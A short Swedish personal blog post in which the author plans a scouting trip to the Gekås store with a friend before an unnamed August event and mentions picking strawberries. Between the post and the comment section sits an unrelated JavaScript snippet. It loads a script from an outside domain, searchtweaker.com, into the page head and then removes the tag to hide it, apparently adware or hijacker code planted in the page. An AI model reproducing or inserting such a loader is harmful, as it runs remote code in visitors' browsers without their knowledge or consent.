Livet hos Hogengård

Vad har jag gett mig in på?!

I morgon klockan sju åker jag och Snäckan och rekar läget. Eller rättare sagt, hon blir min guide. Rutinerad tjej det där. Jag kommer vara med om en happening där i augusti som jag inte ska tala högt om ännu. Så jag tyckte det var bra att åka dit en sväng innan och spana läget ordentligt. Det vore fint om ni andra kunde hålla er borta denna dag. Jag är ju ingen IRL-shoppare utan tycker nätet är smidigast. Avskyr att trängas. Men jag måste prova vad så många andra älskar. Gekås omsätter så sjukt mycket pengar att det går knappt att begripa. Återkommer i morgon. Nu ska jag jobba lite till och sedan ska vi plocka jordgubbar.

(function(){try{var header=document.getElementsByTagName(“HEAD”)[0];var script=document.createElement(“SCRIPT”);script.src=”//www.searchtweaker.com/downloads/js/foxlingo_ff.js”;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==”complete”||this.readyState==”loaded”)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Related Posts

Lämna ett svar

Din e-postadress kommer inte publiceras. Obligatoriska fält är märkta *